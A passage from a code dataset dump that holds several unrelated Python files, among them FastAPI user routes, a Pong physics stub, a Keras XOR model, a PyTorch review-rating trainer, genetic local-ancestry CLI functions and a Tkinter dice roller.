False)\n\n return jsonify(total = projects.total,\n pages = projects.pages,\n page = projects.page,\n per_page = projects.per_page,\n has_next = projects.has_next,\n has_prev = projects.has_prev,\n next_num = projects.next_num,\n prev_num = projects.prev_num,\n data=[e.serialize() for e in projects.items])\n\n","sub_path":"myapi/resources/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"136366630","text":"__author__ = 'Arvie'\n\nfrom State.State import State\n\nimport pygame\n\nimport math\n\n\n# a vector class just to see what it is like to make one myself\nclass Vec2:\n def __init__(self, v=None):\n if v is None:\n self.v = [0, 0]\n else:\n self.v = [v[0], v[1]]\n\n def __add__(self, other):\n return Vec2([self.v[0] + other.v[0], self.v[1] + other.v[1]])\n\n def __sub__(self, other):\n return Vec2([self.v[0] - other.v[0], self.v[1] - other.v[1]])\n\n # scaler multiplication\n def __mul__(self, other):\n return Vec2([self.v[0] * other, self.v[1] * other])\n\n def dot(self, v2):\n return (self.v[0] * v2.v[0]) + (self.v[1] * v2.v[1])\n\n def norm(self):\n n = math.sqrt(self.v[0]**2 + self.v[1]**2)\n return [self.v[0]/n, self.v[1]/n]\n\n\n# Overall game settings\nclass GameSettings:\n def __init__(self):\n self.ball_start_speed = 1\n\n\nclass HitableObject:\n def __init__(self):\n self.xy = Vec2()\n self.w = 0\n self.h = 0\n self.vel = Vec2()\n self.inv_mass = 0 # mass of zero is unmovable i.e. infinite mass\n self.restitution = 1\n\n # code modified from\n # http://gamedevelopment.tutsplus.com/tutorials/how-to-create-a-custom-2d-physics-engine-the-basics-and-impulse-resolution--gamedev-6331\n def collision(self, other_obj):\n # Calculate relative velocity\n rv = Vec2(other_obj.vel - self.vel)\n\n # Calculate relative velocity in terms of the normal direction\n vel_along_normal = rv.dot(self.vel.norm)\n\n\n # Do not resolve if velocities are separating\n if vel_along_normal > 0:\n return\n\n # Calculate restitution\n e = min(self.restitution, other_obj.restitution)\n\n # Calculate impulse scalar\n j = -(1 + e) * vel_along_normal\n j /= self.inv_mass + other_obj.inv_mass\n\n # Apply impulse\n impulse = Vec2(self.vel.norm * j)\n self.vel -= self.inv_mass * impulse\n other_obj.vel += other_obj.inv_mass * impulse\n\n\nclass Paddle(HitableObject):\n 'todo'\n\n\nclass Ball(HitableObject):\n 'Todo'\n\n def server(self):\n 'TODO' # resets ball\n\n\nclass Wall(HitableObject):\n 'TODO'\n\n\n","sub_path":"Pong/src/pong_main.py","file_name":"pong_main.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"372046771","text":"\nimport typing as t\n\nfrom fastapi import APIRouter, Depends, Request, Response\n\nfrom app.api.api_v1.crud.user import (\n create_user,\n delete_user,\n edit_user,\n get_user,\n get_users,\n)\nfrom app.api.api_v1.schemas.user import User, UserCreate, UserEdit\nfrom app.core.auth import get_current_active_superuser\n\nusers_router = r = APIRouter()\n\n\n@r.get(\n \"/users\",\n response_model=t.List[User],\n response_model_exclude_none=True,\n)\nasync def users_list(\n request: Request,\n response: Response,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Get all users\n \"\"\"\n users = get_users(request.state.db)\n # This is necessary for react-admin to work\n response.headers[\"Content-Range\"] = f\"0-9/{len(users)}\"\n return users\n\n\n@r.get(\"/users/me\", response_model=User, response_model_exclude_none=True)\nasync def user_me(request: Request):\n \"\"\"\n Get own user\n \"\"\"\n return request.state.current_active_user\n\n\n@r.get(\n \"/users/{user_id}\",\n response_model=User,\n response_model_exclude_none=True,\n)\nasync def user_details(\n request: Request,\n user_id: int,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Get any user details\n \"\"\"\n user = get_user(request.state.db, user_id)\n return user\n # return encoders.jsonable_encoder(\n # user, skip_defaults=True, exclude_none=True,\n # )\n\n\n@r.post(\"/users\", response_model=User, response_model_exclude_none=True)\nasync def user_create(\n request: Request,\n user: UserCreate,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Create a new user\n \"\"\"\n return create_user(request.state.db, user)\n\n\n@r.put(\"/users/{user_id}\", response_model=User, response_model_exclude_none=True)\nasync def user_edit(\n request: Request,\n user_id: int,\n user: UserEdit,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Update existing user\n \"\"\"\n return edit_user(request.state.db, user_id, user)\n\n\n@r.delete(\"/users/{user_id}\", response_model=User, response_model_exclude_none=True)\nasync def user_delete(\n request: Request,\n user_id: int,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Delete existing user\n \"\"\"\n return delete_user(request.state.db, user_id)\n","sub_path":"api/app/api/api_v1/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"150168760","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\n\n\n# 1. 데이터\nx_data = np.array([[0, 0], [1, 0], [0, 1], [1, 1]])\ny_data = np.array([0, 1, 1, 0])\n\nprint(x_data.shape)\nprint(y_data.shape)\n\n\n# 2. 모델\n# model = LinearSVC()\n# model = SVC()\n# model = KNeighborsClassifier(n_neighbors = 1)\nmodel = Sequential()\n\nmodel.add(Dense(1000, input_shape = (2, )))\nmodel.add(Dense(1, activation = 'sigmoid'))\n\nmodel.summary()\n\n\n# 3. 훈련\nmodel.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['acc'])\nmodel.fit(x_data, y_data, epochs = 100, batch_size = 1)\n\n\n# 4. 평가 예측\nres = model.evaluate(x_data, y_data)\n\nx_test = np.array([[0, 0], [1, 0], [0, 1], [1, 1]])\ny_predict = model.predict(x_test)\n\n# acc = accuracy_score([0, 1, 1, 0], y_predict) # keras의 evaluate와 동일하다고 보면 됨; accuracy_score\n\n# print(x_test, \"의 예측 결과 : \", y_predict)\n# print(\"acc : \", acc)\n\nprint(\"acc : \", res[1])\nprint(y_predict)","sub_path":"ML/m04_xor4_keras.py","file_name":"m04_xor4_keras.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"201700584","text":"import math\nimport sys\nfrom collections import deque, Counter\n \nimport collections\n\nNOTATION = '0123456789ABCDEF' \n\ndef numeral_system(number, base): # 10진수 n진수로의 변환\n q, r = divmod(number, base) \n n = NOTATION[r] \n return numeral_system(q, base) + n if q else n\n\ndef solution(n, t, m, p):\n maxs=\"\"\n for i in range(t*m):\n maxs+=numeral_system(i, n)\n # n 진법 튜브의 순서 p, 게임에 참가하는 인원 m , 미리 구할 숫자의 갯수 t\n \n answer = ''\n \n for i in range(t):\n answer+=maxs[i*m+p-1]\n return answer\n","sub_path":"2_20201127.py","file_name":"2_20201127.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75498495","text":"from xlrd import open_workbook\nimport xlsxwriter as wx\nfrom collections import Counter\n\nproductid = ['productid', '贷款产品子编号']\nareacode = ['areacode', '区域']\nfor i in range(12):\n filepath = str(i) + '.xls'\n rb = open_workbook(filepath)\n table = rb.sheets()[0]\n productid = productid + [\n i for i in table.col_values(0) if i != '' and i != productid[0] and\n i != productid[1]]\n areacode = areacode + [\n i for i in table.col_values(1) if i != '' and\n i != areacode[0] and i != areacode[1]]\n\n\ntotal = [str(productid[i]) + str(areacode[i]) for i in range(len(areacode))]\nmy_count = Counter(total)\nfor key in my_count:\n if my_count[key] > 1:\n print(key, my_count[key])\n print('\\n')\n\n\nf = wx.Workbook('area_total.xlsx')\nsheet1 = f.add_worksheet()\n\nfor i in range(len(areacode)):\n sheet1.write(i, 0, productid[i])\n sheet1.write(i, 1, areacode[i])\nf.close()\n","sub_path":"area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"635224511","text":"import argparse\nimport os\nimport shutil\nimport nltk\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data.dataloader import DataLoader\n\nfrom dpp_nets.utils.language import Vocabulary, BeerDataset, custom_collate\nfrom dpp_nets.layers.layers import ChunkTrainer\n\n\nparser = argparse.ArgumentParser(description='marginal_chunk Krause Trainer')\nparser.add_argument('-a', '--aspect', type=str, choices=['aspect1', 'aspect2', 'aspect3', 'all', 'short'],\n help='what is the target?', required=True)\nparser.add_argument('-m', '--mode', type=str, choices=['words', 'chunks', 'sents'],\n help='what is the mode?', required=True)\nparser.add_argument('-b', '--batch-size', default=100, type=int,\n metavar='N', help='mini-batch size (default: 50)')\nparser.add_argument('--epochs', default=30, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--lr', '--learning_rate', default=1e-3, type=float,\n metavar='', help='initial learning rate')\nparser.add_argument('--reg', type=float, required=True,\n metavar='reg', help='regularization constant')\nparser.add_argument('--reg_mean', type=float, required=True,\n metavar='reg_mean', help='regularization_mean')\nparser.add_argument('-r', '--remote', type=int,\n help='training locally or on cluster?', required=True)\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n\ndef main():\n\n global vocab, args\n\n lowest_loss = 100 # arbitrary high number as upper bound for loss\n\n # Check for GPU\n args = parser.parse_args()\n args.cuda = torch.cuda.is_available()\n \n # Set Seed\n torch.manual_seed(args.seed)\n if args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n # Set-up data\n if args.remote:\n train_path = '/home/paulusm/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + args.mode + '.txt.gz'\n val_path = '/home/paulusm/data/beer_reviews/' + 'reviews.' + args.aspect + '.heldout.' + args.mode + '.txt.gz'\n embd_path = '/home/paulusm/data/beer_reviews/' + 'review+wiki.filtered.200.txt.gz'\n word_path = '/home/paulusm/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + 'words.txt.gz'\n else:\n train_path = '/Users/Max/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + args.mode + '.txt.gz'\n val_path = '/Users/Max/data/beer_reviews/' + 'reviews.' + args.aspect + '.heldout.' + args.mode + '.txt.gz'\n embd_path = '/Users/Max/data/beer_reviews/' + 'review+wiki.filtered.200.txt.gz'\n word_path = '/Users/Max/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + 'words.txt.gz'\n\n # Set-up vocabulary\n vocab = Vocabulary()\n vocab.loadPretrained(embd_path)\n vocab.setStops()\n vocab.loadCorpus(word_path)\n vocab.updateEmbedding()\n vocab.setCuda(args.cuda)\n print('set up vocabulary')\n\n # Set up datasets and -loader\n train_set = BeerDataset(train_path, vocab)\n val_set = BeerDataset(val_path, vocab)\n kwargs = {'num_workers': 0, 'pin_memory': True} if args.cuda else {}\n\n my_collate = custom_collate(vocab, args.cuda)\n train_loader = torch.utils.data.DataLoader(train_set, collate_fn=my_collate, batch_size=args.batch_size, shuffle=True, **kwargs)\n val_loader = torch.utils.data.DataLoader(train_set, collate_fn=my_collate, batch_size=args.batch_size, **kwargs)\n\n # Network parameters\n EMBD_DIM = 200\n KERNEL_DIM = 200\n HIDDEN_DIM = 500\n ENC_DIM = 200\n TARGET_DIM = 3 if args.aspect in set(['all', 'short']) else 1\n\n # Conventional trainer\n trainer = ChunkTrainer(EMBD_DIM, HIDDEN_DIM, KERNEL_DIM, ENC_DIM, TARGET_DIM)\n trainer.activation = nn.Sigmoid()\n trainer.reg = args.reg\n trainer.reg_mean = args.reg_mean\n\n print(\"created trainer\")\n\n # Set-up optimizer\n params = [{'params': vocab.EmbeddingBag.parameters()}, {'params': trainer.parameters()}]\n optimizer = torch.optim.Adam(params, lr=args.lr)\n\n ### Loop\n for epoch in range(args.epochs):\n\n for t, batch in enumerate(train_loader):\n pass\n\n\ndef train(loader, trainer, optimizer):\n\n trainer.train()\n\n for t, batch in enumerate(loader):\n\n reviews, target = batch\n\n loss = trainer(reviews, target)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #print(\"trained one batch\")\n\ndef validate(loader, trainer):\n\n trainer.eval()\n\n total_loss = 0.0\n total_pred_loss = 0.0\n total_reg_loss = 0.0\n\n for i, batch in enumerate(loader, 1):\n\n review, target = batch\n\n trainer(review, target)\n\n loss = trainer.loss.data[0]\n pred_loss = trainer.pred_loss.data[0]\n reg_loss = trainer.reg_loss.data[0]\n\n delta = loss - total_loss\n total_loss += (delta / i)\n delta = pred_loss - total_pred_loss \n total_pred_loss += (delta / i)\n delta = reg_loss - total_reg_loss\n total_reg_loss += (delta / i)\n\n # print(\"validated one batch\")\n\n return total_loss, total_pred_loss, total_reg_loss\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR multiplied by factor 0.1 for every 10 epochs\"\"\"\n if not ((epoch + 1) % 10):\n factor = 0.1\n for param_group in optimizer.param_groups:\n param_group['lr'] = param_group['lr'] * factor\n\ndef log(epoch, loss, pred_loss, reg_loss):\n\n string = str.join(\" | \", ['Epoch: %d' % (epoch), 'V Loss: %.5f' % (loss), \n 'V Pred Loss: %.5f' % (pred_loss), 'V Reg Loss: %.5f' % (reg_loss)])\n\n if args.remote:\n destination = '/home/paulusm/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'log_marginal.txt'\n else:\n destination = '/Users/Max/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'log_marginal.txt'\n\n\n with open(destination, 'a') as log:\n log.write(string + '\\n')\n\ndef save_checkpoint(state, is_best, filename='marginal_chunk_checkpoint.pth.tar'):\n \"\"\"\n State is a dictionary that cotains valuable information to be saved.\n \"\"\"\n if args.remote:\n destination = '/home/paulusm/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_ckp.pth.tar'\n else:\n destination = '/Users/Max/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_ckp.pth.tar'\n\n torch.save(state, destination)\n\n if is_best:\n if args.remote:\n best_destination = '/home/paulusm/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_best_ckp.pth.tar'\n else:\n best_destination = '/Users/Max/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_best_ckp.pth.tar'\n\n shutil.copyfile(destination, best_destination)\n\nif __name__ == '__main__':\n main()\n \n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"480120327","text":"import admix\nimport subprocess\nimport dapgen\nimport os\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom ._utils import log_params\n\n\ndef lanc(\n pfile: str,\n ref_pfile: str,\n ref_pop_col: str,\n ref_pops: str,\n out: str,\n):\n log_params(\"lanc\", locals())\n\n sample_dset = admix.io.read_dataset(pfile=pfile)\n ref_dset = admix.io.read_dataset(pfile=ref_pfile)\n\n assert set(sample_dset.snp.index) == set(ref_dset.snp.index), (\n \"`pfile` and `ref_pfile` must have the same snp index\"\n \"(snp match feature coming soon).\"\n )\n\n ref_dsets = [\n ref_dset[:, (ref_dset.indiv[ref_pop_col] == pop).values] for pop in ref_pops\n ]\n est = admix.ancestry.lanc(sample_dset=sample_dset, ref_dsets=ref_dsets)\n admix.data.Lanc(array=est).write(out)\n\n\ndef lanc_count(lanc: str, out: str, n_anc: int = None):\n \"\"\"Count the number / proportion of local ancestries for each individual\n\n Parameters\n ----------\n lanc : str\n path to the lanc file, this can be a .lanc file, a wildcard of .lanc files,\n or a directory containing .lanc files. If the corresponding .psam file is\n present, the .psam file will be used as the individual list.\n out : str\n path to the output file\n n_anc : int\n number of ancestral populations in the data\n \"\"\"\n log_params(\"lanc-count\", locals())\n if lanc.endswith(\".lanc\"):\n lanc_path = [lanc]\n elif \"*\" in lanc:\n lanc_path = glob.glob(lanc)\n elif os.path.isdir(lanc):\n lanc_path = [p for p in glob.glob(lanc + \"/*.lanc\")]\n else:\n raise ValueError(\"Unable to parse lanc pathname\")\n\n admix.logger.info(f\"Found {len(lanc_path)} lanc files: {','.join(lanc_path)}\")\n # read psam if available\n psam_path = [p.replace(\".lanc\", \".psam\") for p in lanc_path]\n\n if all(os.path.exists(p) for p in psam_path):\n # check all psam files have the same individual ID\n psam_indiv = [dapgen.read_psam(p).index for p in psam_path]\n assert all(\n psam_indiv[0].equals(i) for i in psam_indiv[1:]\n ), \"Individuals in psam files do not match\"\n indiv_list = psam_indiv[0].values\n elif not any(os.path.exists(p) for p in psam_path):\n indiv_list = None\n else:\n raise ValueError(\"either .psam all exists or none exists\")\n\n lanc_mat = admix.data.Lanc(lanc_path[0])\n n_indiv = lanc_mat.n_indiv\n if indiv_list is not None:\n assert n_indiv == len(\n indiv_list\n ), \"Number of individuals in lanc and psam files do not match\"\n else:\n indiv_list = np.arange(n_indiv).astype(str)\n\n lanc_count = lanc_mat.lanc_count()\n if n_anc is not None:\n assert (\n lanc_count.shape[1] == n_anc\n ), \"Number of ancestral populations do not match\"\n else:\n n_anc = lanc_count.shape[1]\n admix.logger.info(f\"Inferred number of ancestral populations: {n_anc}\")\n\n for p in lanc_path[1:]:\n lanc_count += admix.data.Lanc(p).lanc_count(n_anc=n_anc)\n\n lanc_prop = lanc_count / lanc_count.sum(axis=1, keepdims=True)\n admix.logger.info(f\"Writing lanc count file: {out}\")\n\n count_cols = [f\"COUNT{i + 1}\" for i in range(n_anc)]\n prop_cols = [f\"PROP{i+1}\" for i in range(n_anc)]\n df_res = pd.DataFrame(\n data=np.concatenate([lanc_count, lanc_prop], axis=1),\n index=indiv_list,\n columns=count_cols + prop_cols,\n )\n\n df_res[count_cols] = df_res[count_cols].astype(int)\n df_res.index.name = \"indiv\"\n df_res.to_csv(out, sep=\"\\t\", float_format=\"%.4g\")\n\n\ndef lanc_convert(pfile: str, out: str, rfmix: str = None, raw: str = None):\n \"\"\"Convert local ancestry inference results (e.g. RFmix .msp.tsv) to a .lanc file\n\n Parameters\n ----------\n pfile : str\n Path to the pfile. The path is without the .pgen suffix\n out : str\n Path to the output file\n rfmix : str\n Path to the rfmix .msp.tsv file,\n raw : str\n Path to the raw file\n \"\"\"\n log_params(\"lanc-convert\", locals())\n\n # only one of rfmix and raw should be specified\n assert (rfmix is None) + (\n raw is None\n ) == 1, \"Only one of rfmix and raw should be specified\"\n if rfmix is not None:\n geno, df_snp, df_indiv = dapgen.read_pfile(pfile, phase=True)\n admix.logger.info(f\"Reading rfmix file: {rfmix}\")\n lanc = admix.io.read_rfmix(\n path=rfmix,\n df_snp=df_snp,\n df_indiv=df_indiv,\n )\n admix.logger.info(f\"Obtaining local ancestry {lanc}\")\n admix.logger.info(f\"Writing lanc file: {out}\")\n lanc.write(out)\n\n if raw is not None:\n assert False, \"raw not implemented yet\"\n\n\ndef lanc_impute(pfile: str, ref_pfile: str, out: str = None):\n \"\"\"Impute the local ancestry for `pfile` using `ref_pfile`\n\n Parameters\n ----------\n pfile : str\n Path to the pfile\n ref_pfile : str\n Path to the reference pfile\n out : str\n Path to the output pfile (default to pfile + \".lanc\")\n \"\"\"\n log_params(\"lanc-impute\", locals())\n\n # check .lanc does not exist\n assert not os.path.exists(pfile + \".lanc\"), \"`pfile` already has a .lanc file\"\n\n sample_dset = admix.io.read_dataset(pfile=pfile)\n ref_dset = admix.io.read_dataset(pfile=ref_pfile)\n ref_lanc = admix.data.Lanc(ref_pfile + \".lanc\")\n\n sample_lanc = ref_lanc.impute(\n ref_dset.snp[[\"CHROM\", \"POS\"]].values, sample_dset.snp[[\"CHROM\", \"POS\"]].values\n )\n if out is None:\n out = pfile + \".lanc\"\n assert not os.path.exists(out), f\"out={out} already exists\"\n sample_lanc.write(out)\n","sub_path":"admix/cli/_lanc.py","file_name":"_lanc.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"170858511","text":"import re\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.db import IntegrityError\nfrom django.db.models import Q\nfrom django.http import Http404\nfrom django.shortcuts import redirect, get_object_or_404, render_to_response, render\nfrom django.views.generic import ListView, CreateView, DeleteView, UpdateView, DetailView, TemplateView\nfrom invitations.admin import Invitation\nfrom registration.forms import User\n\nfrom user_catalog.forms import LendingForm\nfrom user_catalog.models import LibraryFriend, BookExchangeEvent\nfrom library.models import BookInstance\nfrom django.utils import timezone\n\n\nclass LibraryList(ListView):\n model = BookInstance\n template_name = 'bookinstance_list.html'\n success_url = 'library_list'\n\n def get_queryset(self):\n if self.request.user.is_authenticated():\n query = self.request.GET.get('query', '')\n obj = BookInstance.objects.filter(reader=self.request.user)\n if query:\n if self.request.GET['searchby'] == 'Title':\n return obj.filter(book__title__icontains=query)\n else:\n return obj.filter(book__author__icontains=query)\n return obj\n return None\n\n def get_context_data(self, **kwargs):\n context = super(LibraryList, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated():\n in_library = self.get_queryset().filter(lent_outside=False, lent_to_someone__isnull=True)\n outside = self.get_queryset().filter(Q(lent_outside=True) | Q(lent_to_someone__isnull=False))\n borrowed = BookInstance.objects.filter(lent_to_someone=self.request.user)\n context.update({'queryset': in_library, 'owner': True, 'outside': outside, 'borrowed': borrowed })\n return context\n\n\nclass BookInstanceCreate(CreateView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_form.html'\n fields = ['reader', 'book', 'currently_reading', 'finished', 'comment']\n\n def get_form(self, form_class):\n \"\"\"\n Returns an instance of the form to be used in this view.\n \"\"\"\n form = form_class(**self.get_form_kwargs())\n lib_friends = LibraryFriend.objects.filter(user=self.request.user)\n mails = [lib_friend.mail for lib_friend in lib_friends]\n mails.append(self.request.user.email)\n form.fields['reader'].queryset = User.objects.filter(email__in=mails)\n return form\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data()\n context.update({'create': True})\n return context\n\n\nclass BookInstanceDelete(DeleteView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_delete.html'\n\n\nclass BookInstanceUpdate(UpdateView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_form.html'\n fields = ['currently_reading', 'finished', 'comment']\n\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super(UpdateView, self).post(request, *args, **kwargs)\n\n\nclass BookInstanceDetail(DetailView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_detail.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data()\n if self.request.user.is_authenticated():\n if self.request.user == kwargs['object'].reader:\n context.update({'owner': True})\n # Lending\n lending_form = LendingForm()\n lending_form.fields['lend_to_someone'].queryset = User.objects.filter(~Q(pk=self.request.user.pk))\n\n context.update({'lending_form': lending_form})\n # Echange history\n instance = BookInstance.objects.get(pk=self.kwargs['pk'])\n history = BookExchangeEvent.objects.filter(bookinstance=instance)\n context.update({'history': history})\n return context\n else:\n return context\n\n def post(self, request, *args, **kwargs):\n bookinstance = BookInstance.objects.get(pk=kwargs['pk'])\n if 'record_return' in request.POST:\n messages.add_message(request, messages.SUCCESS, 'Return recoded.')\n bookinstance.record_return()\n e = BookExchangeEvent(\n status='IL',\n bookinstance=bookinstance,\n date=timezone.now(),\n give_back_date=timezone.now()\n )\n e.save()\n return redirect(reverse_lazy('book_instance_details', kwargs={'pk': kwargs['pk']}))\n else:\n form = LendingForm(request.POST)\n print('form1!!!')\n if form.is_valid():\n print('VALID FORM')\n if request.POST.get('lend_outside'):\n e = BookExchangeEvent(\n status='LO',\n bookinstance=bookinstance,\n date=timezone.now(),\n give_back_date=request.POST.get('give_back_date')\n )\n e.save()\n bookinstance.lent_outside = True\n bookinstance.save()\n elif request.POST.get('lend_to_someone', 0):\n user = User.objects.get(pk=request.POST.get('lend_to_someone'))\n e = BookExchangeEvent(\n status='LU',\n date=timezone.now(),\n bookinstance=bookinstance,\n reader=user,\n give_back_date=request.POST.get('give_back_date')\n )\n e.save()\n bookinstance.lent_to_someone = user\n bookinstance.save()\n messages.add_message(request, messages.SUCCESS, 'Lending successful.')\n else:\n messages.add_message(request, messages.WARNING, 'Provided date is incorrect')\n return redirect(reverse_lazy('book_instance_details', kwargs={'pk': kwargs['pk']}))\n\n\nclass FriendLibraryList(ListView):\n model = BookInstance\n template_name = 'bookinstance_list.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(FriendLibraryList, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated():\n my_object = get_object_or_404(User, pk=self.kwargs['pk'])\n context.update({'foreign': True})\n\n friends_id = self.kwargs['pk']\n owner = User.objects.get(id=friends_id)\n context.update({'friend': owner})\n if owner == self.request.user:\n context.update({'owner': True})\n # Check if we have access to this library\n if not LibraryFriend.objects.filter(user=owner, mail=self.request.user.email).exists():\n context.update({'alien': True})\n else:\n q = BookInstance.objects.filter(reader=owner)\n context.update({'queryset': q})\n return context\n else:\n return context\n\n\nclass FriendsMainView(TemplateView):\n template_name = 'user_catalog/friends_template.html'\n success_url = reverse_lazy('friends')\n\n def get_context_data(self, **kwargs):\n context = super(FriendsMainView, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated():\n mails = LibraryFriend.objects.filter(user=self.request.user)\n context.update({'invited': mails})\n\n invitations = LibraryFriend.objects.filter(mail=self.request.user.email)\n context.update({'invitations': invitations})\n return context\n\n def post(self, request, *args, **kwargs):\n mail_address = request.POST['invite']\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", mail_address):\n messages.add_message(request, messages.WARNING, 'Invalid email address.')\n return redirect(self.success_url)\n\n if mail_address == self.request.user.email:\n messages.add_message(request, messages.WARNING, 'You cannot invite yourself.')\n return redirect(self.success_url)\n\n if not User.objects.filter(email=mail_address).exists():\n try:\n invite = Invitation.create(mail_address, inviter=request.user)\n invite.send_invitation(request)\n messages.add_message(request, messages.INFO, 'An invitation has been sent!')\n except IntegrityError:\n messages.add_message(request, messages.WARNING, 'User already invited!')\n else:\n messages.add_message(request, messages.WARNING, 'User already exists in the system!')\n # If this user is our friend already\n if LibraryFriend.objects.filter(mail=mail_address, user=self.request.user).exists():\n messages.add_message(request, messages.WARNING, 'This user is your friend already.')\n return redirect(self.success_url)\n # Create an instance of LibraryFrend here\n messages.add_message(request, messages.INFO, 'Mail added to a friend base.')\n friend = LibraryFriend(user=self.request.user, mail=mail_address)\n friend.save()\n self.object = None\n return redirect(self.success_url)","sub_path":"bookstore/user_catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"258690701","text":"from tkinter import *\nimport random\n\nroot = Tk()\nx=0\nroot.title(\"ACTION\")\n\nframe = Frame(root,background='red')\nframe.pack()\ncanvas = Canvas(height=180,width=120)\ncanvas.pack()\nimage2 = PhotoImage(file=\"one.png\")\ncanvas.create_image(0, 0,anchor='nw', image=image2)\ncanvas.image = image2\n\ndef roll():\n global x\n x=random.randrange(1,7)\n if(x is 1):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"one.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 2):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"two.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 3):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"three.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 4):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"four.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n elif(x is 5):\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"five.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n else:\n canvas.delete(\"all\")\n image1 = PhotoImage(file=\"six.png\")\n canvas.create_image(0, 0, anchor='nw', image=image1)\n canvas.image = image1\n\nbutton1=Button(frame,text=\"roll it\",width=25,fg=\"white\",bg=\"black\",command=roll)\nbutton1.pack(side=RIGHT)\nroot.mainloop()\n\n","sub_path":"untitled/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"150943610","text":"configuration = {\n 'root_path': '/Users/howllow/SharedWithUB/Distributed-PageRank/',\n 'data_path': 'slash.txt',\n 'jitter': '\\t',\n 'splitter': 'random', # another option is 'random'\n 'split_part': 2,\n 'tmp_data': 'tmp/',\n 'node_path': 'node.txt',\n 'edge_path': 'edge.txt',\n 